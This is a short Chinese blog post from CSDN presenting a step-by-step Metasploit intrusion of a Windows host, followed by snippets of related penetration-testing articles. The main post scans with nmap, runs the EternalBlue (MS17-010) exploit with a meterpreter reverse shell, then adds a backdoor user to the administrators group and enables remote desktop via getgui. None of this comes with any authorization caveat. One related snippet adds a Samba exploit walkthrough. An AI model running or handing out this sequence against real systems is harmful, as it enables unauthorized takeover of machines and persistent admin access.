如何利用MSF进行系统检测

最新推荐文章于 2022-10-24 10:59:35 发布
最新推荐文章于 2022-10-24 10:59:35 发布
阅读量304 收藏 1
点赞数 1
文章标签: java windows 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_57567689/article/details/126394609
版权

在初次学习中,选择一个简单的目标进行测试!!!

#注:当遇到“meterpreter >”时!!!,说明你已经可以成功一半了

①首先通过nmap -v -A XXX.XXX.XXX.XXX检测.

在检测完XXX.XXX.XXX.XXX的端口号后,通过“msfconsole”启动控制,得到“msf6”.

②得到“msf6”后,利用Windows中的"ipconfig"和linux中的"ifconfig"获得IP地址.

msf6 > use exploit/windows/smb/ms17_010_eternalblue

[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp

msf6 exploit(windows/smb/ms17_010_eternalblue) > set lhost XXX.XXX.XXX.XXX

lhost => XXX.XXX.XXX.XXX

msf6 exploit(windows/smb/ms17_010_eternalblue) > set rhosts XXX.XXX.XXX.XXX

rhosts =>XXX.XXX.XXX.XXX

msf6 exploit(windows/smb/ms17_010_eternalblue) > run

③然后通过“sysinfo”查询信息.

④得到“meterpreter”后,通过以下操作获得权限

meterpreter> shell

cmd> net user XXXX XXXX@ /add

cmd>net localgroup administrs XXXX /add

cmd>exit meterpreter>run getgui -e

⑤最后得到控制权限!!

#注:

自身系统域名XXX.XXX.XXX.XXX与其他系统域名XXX.XXX.XXX.XXX不一致时,需要开始嫁接.

凯凯_0523
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
使用Metasploit入侵windows之自动扫描
08-07
Metasploit入侵windows之自动扫描方法
msf扫描服务器漏洞,并发现漏洞对系统的入侵
最新发布
b312738566的博客
10-20 1461
学会利用扫描工具来扫描服务器的漏洞,并通过发现的漏洞对系统进行入侵,上传木马并远程控制服务器,学生通过实验感性认识黑客入侵。工具软件:metasploit、windows系统、木马启动Msfconsole。
MSF(Metasploit)渗透测试---黑客工具使用指南
kuokay的博客
06-07 6294
渗透测试者的困扰:在众多相同类型的工具,丌知道如何选择。认为需要掌插数百个工具软件,上千个命令参数,实在记丌住。新出现的漏洞 POC/EXP 有丌同的运行环境要求,准备工作繁琐。大部分时间都在学习丌同工具的使用习惯,如果能统一就好了,迚而 Metasploit 就产生了。POC,全称”Proof of Concept”,中文“概念验证”,常挃一段漏洞证明的代码。EXP,全称”Exploit”,中文“利用”,挃利用系统漏洞迚行攻击的劢作。 Metasploit 框架是可以添加漏洞代码片段,就好比一个军火库,
MSF详解及常用命令之利用msf控制目标电脑
世间繁华梦一出
12-21 2572
MSF基本操作详解序言:MSF简介1、模块介绍2、基本命令3、后渗透4、msfvenom生成后门木马 ** 序言:MSF简介 Metasploit简称msf,Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程。团队合作,在Metasploit和综合报告提出了他们的发现。 ** 1、模块介绍 它是一个渗透测试框架(模块介绍) auxi
演示使用Metasploit入侵Windows
qq284489030的博客
05-09 2674
我使用KaliLinux的IP地址是192.168.0.112;在同一局域网内有一台运行WindowsXP(192.168.0.108)的测试电脑。   本文演示怎么使用Metasploit入侵windows xp sp3。   启动msfconsole:   # msfconsole   选择一个漏洞:   msf > search platform: windows...
元器件应用中的MSF系列MSF7905集成电路实用检测数据
11-20
在对MSF7905进行检测时,应将三用表设置为直流电压挡(DC挡)来测量电压,同时设置电阻测量挡为×100Ω挡来检查在路电阻。 表中的数据详细记录了MSF7905在索尼MDP-U3/D3型VCD影碟机上的工作状态。这些数据包括了...
元器件应用中的MSF系列MSF7805L集成电路实用检测数据
11-20
MSF7805L是一款专门用于提供稳定+5V电源的集成电路,它在电子设备中扮演着至关重要的角色,确保系统内部各个组件能够获得精确且稳定的电压供应。这款芯片通常采用3脚单列直插式(TO-92)塑料封装,这种封装方式紧凑...
元器件应用中的MSF系列MSF7807集成电路实用检测数据
11-20
进行MSF7807的检测时,除了使用三用表测量工作电压外,还需要关注其他关键参数,如输出电流能力、纹波电压、热稳定性以及效率等。这些参数的合理范围将直接影响到集成电路在系统中的表现和整体设备的性能。 总结...
元器件应用中的MSF系列MSF7805F集成电路实用检测数据
11-20
MSF7805F是一款常用的电源稳压集成电路,它被设计用于提供稳定的+5V电压输出。...在索尼HCD-V4500型VCD影碟机的案例中,MSF7805F的检测数据提供了宝贵的参考信息,帮助我们评估和维护系统的电源稳定性。
元器件应用中的MSF系列MSF7807L集成电路实用检测数据
11-20
MSF7807L是一款专门用于提供稳定+7V电源的集成电路,它在电子设备中扮演着至关重要的角色,确保系统内部电路的稳定运行。该芯片采用3脚单列直插式塑料封装,设计紧凑,易于安装在电路板上。这种封装方式既节省空间,...
msf的一次简单测试 可以看看
03-18
msf我想没人不知道吧 这个是一个msf的小测试 视频不知道丢哪了
渗透测试工具篇之Metasploit(MSF)扫描模块的简单使用
lzp_5257的博客
04-26 5680
提示:文章内容仅用于渗透测试研究学习,请勿用于非法测试 前言 MSF扫描模块的作用就是帮助我们进行信息收集 一、MSF与nmap的调用 漏洞扫描命令:(使用vuln脚本进行全面的漏洞扫描) db_nmap --script=vuln 192.168.xxx.xxx 指纹识别扫描命令:(扫描系统和程序版本号检测,并输出详细信息) db_nmap -sV -v 193.168.xxx.xxx 二、使用步骤 1.引入库 代码如下(示例): import numpy as np import panda.
【常用工具】MSF使用教程(一)漏洞扫描与利用(以永恒之蓝漏洞复现为例)
Fighting_hawk的博客
03-27 2万+
1. 了解MSF框架的使用方法。 2. 了解永恒之蓝漏洞。
渗透测试 ( 3 ) --- Metasploit Framework ( MSF )
freeking101的博客
07-02 8294
Metasploit专业版和精简版的主要差别在于专业版上面集成了全自动攻击模块,通过远程API集成网络分割测试模块、标准基线审计向导模块、闭环漏洞验证优先处理功能、动态载荷规避防病毒解决方案、钓鱼意识管理和鱼叉式网络钓鱼模块、对OWASP Top 10漏洞的Web应用程序测试模块、高级命令行和Web界面的选择模块。但是,专业版是必须要付费的,所以除非用到非个人的功能,否则没有必要去使用专业版,而且,专业版和精简版的渗透攻击模块是一样的。.........
内网渗透 Metasploit(MSF)基础使用
qq_49433473的博客
10-24 1万+
内网渗透 Metasploit(MSF)使用,信息搜集,模块详解,端口扫描,反弹shell
WEB安全学习第五天:系统和数据库
weixin_43171447的博客
04-19 2240
1 实验环境与工具 kali linux nmap metasploit(msf) 2 相关知识点 2.1 操作系统识别 1.通过浏览器修改URL查看:windows的URL不区分大小写,linux区分 2.通过cmd来ping网站查看TTL值来大致判断 3.使用nmap的-O命令对网站进行扫描 2.2 数据库类型识别 1.不同的脚本语言往往会搭配特定扥数据库,可以通过查看网站脚本类型进行初步判断。 2.不同数据库有特定端口号,使用nmap对端口进行扫描,查看处于open状态的数据
使用msf(Metasploit Framework)检测MS17-010(永恒之蓝)
sanMu_blog的博客
07-02 1万+
今天是入职的第一天,还是有点忐忑,新地点新事物,希望自己的选择没有错,努力!废话不多说,入职后被安排的第一件事情,就是在Ubuntu环境下搭建msf(metasploit framework渗透框架),然后下午去做渗透测试。个人习惯Windows系统,于是在VMware内安装Ubuntu,由于电脑有VMware,具体的安装就不说了,Ubuntu安装教程本人参考的是Ubuntu安装教程,msf教程是...
渗透测试之Metasploit
11-20
本套教程,我们将为大家详细讲解Metasploit的使用方法。Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程。
详尽的msf——meterpreter——渗透测试教程
热门推荐
qq_42882717的博客
03-21 2万+
详尽的msf——meterpreter——渗透测试教程,如何使用,如何前中后期做渗透测试
利用msf渗透centos7
05-10
Metasploit Framework是一款常用的渗透测试工具,可以用于检测利用系统中的漏洞。下面是在CentOS 7上使用Metasploit Framework进行渗透的基本步骤: 1. 安装Metasploit Framework CentOS 7 可以使用以下命令安装Metasploit Framework: ``` sudo yum install -y postgresql-server postgresql-contrib sudo postgresql-setup initdb sudo systemctl start postgresql sudo systemctl enable postgresql sudo systemctl status postgresql sudo yum install -y https://rpm.metasploit.com/metasploit-framework-latest.el7.x86_64.rpm ``` 2. 启动Metasploit Framework 安装完成后,可以通过以下命令启动Metasploit Framework: ``` sudo msfconsole ``` 等待一段时间,直到出现Metasploit Framework的控制台。 3. 查找目标 在Metasploit Framework的控制台中,可以使用search命令查找目标系统中的漏洞。例如,假设我们要查找目标系统是否存在Samba漏洞,可以使用以下命令: ``` search samba ``` 4. 选择攻击模块 根据搜索结果,选择一个合适的攻击模块。例如,如果我们要攻击Samba漏洞,可以使用以下命令选择相应的攻击模块: ``` use exploit/linux/samba/setinfopolicy_heap ``` 5. 配置攻击模块 配置攻击模块的参数,例如目标系统的IP地址,端口等。可以使用show options命令查看攻击模块的所有参数,使用set命令设置相应的参数。例如: ``` set RHOSTS 192.168.1.100 set RPORT 445 ``` 6. 运行攻击模块 配置完成后,可以使用exploit命令运行攻击模块。Metasploit Framework会自动尝试对目标系统进行攻击,获取系统权限。 上述步骤仅是Metasploit Framework的基本使用方法,具体的渗透测试需要根据实际情况进行调整和选择攻击模块。同时,需要注意遵循法律法规,不得进行未经授权的渗透测试。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值